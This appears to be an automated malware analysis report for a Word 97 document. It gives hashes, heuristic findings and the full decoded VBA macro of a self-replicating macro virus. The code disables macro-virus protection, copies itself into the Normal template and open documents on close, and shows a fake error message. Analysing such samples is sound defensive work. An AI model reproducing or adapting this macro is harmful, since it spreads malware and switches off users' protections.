Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 065cf9d96690efa1…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 33.5 KB
Created: 2001-05-31 12:38:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-26
MD5: 1ce983c5d1a2462db071766697abce50
SHA-1: d17ff56da702965cdb496e25dbdf9f96cb2554fe
SHA-256: 065cf9d96690efa11ba24d07ccd80ef0b7c2f72a123e9e134894649a1a064807
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the VBA macros within this document are designed to disable macro virus protection and replicate themselves to the Normal template and the active document. This self-replication behavior is a strong indicator of malicious intent, aiming for persistence and potential spread across documents. No external IOCs like URLs or file hashes were extracted, but the internal VBA manipulation is the primary threat.

Heuristics (2)

  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  1010 bytes
SHA-256: 3622907e2f8975e54a38fb5d838a14d82046b353195745c49900f84829903232
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Hearer
Private Sub Document_close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'Hearer" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
    End If
    If AD.Lines(1, 1) <> "'Hearer" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
    If (Day(Date) >= 16) Then
     MsgBox "Îøèáêà 1340", vbOKOnly
    End If
    ActiveDocument.Save
End Sub